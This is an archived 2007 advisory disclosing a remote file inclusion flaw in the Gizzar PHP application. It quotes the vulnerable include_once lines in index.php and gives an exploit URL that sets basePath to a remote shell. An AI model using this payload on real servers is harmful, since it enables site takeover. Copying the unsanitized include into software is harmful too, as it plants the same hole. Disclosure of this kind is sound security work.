Gizzar <= (basePath) Remote File Include Vulnerability

2007-04-20T00:00:00
ID SECURITYVULNS:DOC:16797
Type securityvulns
Reporter Securityvulns
Modified 2007-04-20T00:00:00

Description

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Gizzar <= (basePath) Remote File Include Vulnerability

Download: http://mesh.dl.sourceforge.net/sourceforge/gizzar/gizzar-03162002.tar.gz

Discover: BorN To K!LL

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Bug in:

index.php

code:

include_once($basePath."include/config.php"); include_once($basePath."include/access.php");

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

EploiT:

wWw.SiTe.cOm/[path]/index.php?basePath=Shell

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

Greedz 2:

Dr.2 - AsbMay - GolD_M - str0ke ....

wWw.KuW-SeC.cC wWw.Asb-May.nEt

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/